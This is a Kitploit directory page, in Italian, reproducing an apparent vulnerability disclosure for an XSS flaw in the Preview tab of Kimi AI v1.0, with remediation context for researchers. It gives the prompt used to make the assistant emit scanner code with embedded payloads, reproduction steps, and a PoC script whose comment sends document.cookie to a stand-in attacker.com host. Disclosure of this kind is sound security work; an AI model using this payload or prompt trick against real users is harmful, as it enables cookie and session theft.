Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-39107 — Divulgazione dettagliata di una vulnerabilità XSS persistente nella scheda Anteprima di Kimi AI v1.0, con scenario di attacco, PoC e indicazioni di remediation per i ricercatori di sicurezza. | Kitploit
Strumenti/GitHubGitHub/mgtx2/cve-2026-39107
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebSicurezza WebPaper e RicercaApprendimento e Formazione
GitHubmgtx2/cve-2026-39107

CVE-2026-39107

Divulgazione dettagliata di una vulnerabilità XSS persistente nella scheda Anteprima di Kimi AI v1.0, con scenario di attacco, PoC e indicazioni di remediation per i ricercatori di sicurezza.

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-39107: Cross-Site Scripting (XSS) in Kimi AI v1.0

Description

Una vulnerabilità di Cross-Site Scripting (XSS) è presente nella funzionalità 'Preview' dell'interfaccia web di Kimi AI v1.0. L'applicazione non riesce a sanificare o codificare correttamente i payload HTML/JavaScript generati dal modello AI. Quando un utente passa alla scheda 'Preview' per visualizzare il codice generato dall'AI, il payload dannoso viene renderizzato direttamente nel DOM, consentendo l'esecuzione di JavaScript arbitrario nella sessione del browser della vittima.

Ricercatore

Mustafa Hameed

Dettagli della vulnerabilità

  • Tipo di vulnerabilità: Cross-Site Scripting (XSS) persistente/simile a persistente tramite risposta AI
  • Prodotto interessato: Kimi AI
  • Versione interessata: v1.0
  • Componente interessato: scheda 'Preview' / componente di rendering del codice

Scenario di attacco e sfruttamento

La vulnerabilità può essere sfruttata chiedendo all'AI di generare uno strumento o uno script di sicurezza (ad esempio, uno scanner XSS automatico simile a XSStrike) che contenga payload integrati. L'AI genera il codice sorgente dell'applicazione richiesta ma incorpora il payload dannoso all'interno della struttura HTML/JavaScript. Quando la vittima passa alla scheda 'Preview' per testare o visualizzare lo strumento generato, il payload dannoso incorporato bypassa la sanificazione e viene eseguito immediatamente.

Prompt utilizzato:

"Crea un semplice strumento di scansione XSS basato sul web simile a XSStrike. Includi un'interfaccia con un elenco di payload per la scansione."

Esempio di payload dannoso incorporato:

root@kitploit:~
<script>
    alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>

Passaggi per riprodurre

1.Accedi alla piattaforma web di Kimi AI.

2.Fornisci il prompt richiedendo la creazione di uno strumento (come il clone di XSStrike) contenente il codice dello scanner.

3.Attendi che il modello AI generi completamente la risposta con il codice.

4.Fai clic sulla scheda 'Preview' nell'interfaccia di chat per visualizzare l'applicazione renderizzata.

5.L'applicazione non riesce a filtrare il contesto JavaScript all'interno del contenitore di anteprima, provocando l'esecuzione immediata dello script nel browser della vittima.

Prova di concetto (PoC)

Di seguito è riportato lo screenshot che dimostra l'esecuzione riuscita del payload XSS. Il JavaScript dannoso viene attivato immediatamente quando si passa alla scheda 'Preview':

XSS
Scarica lo strumento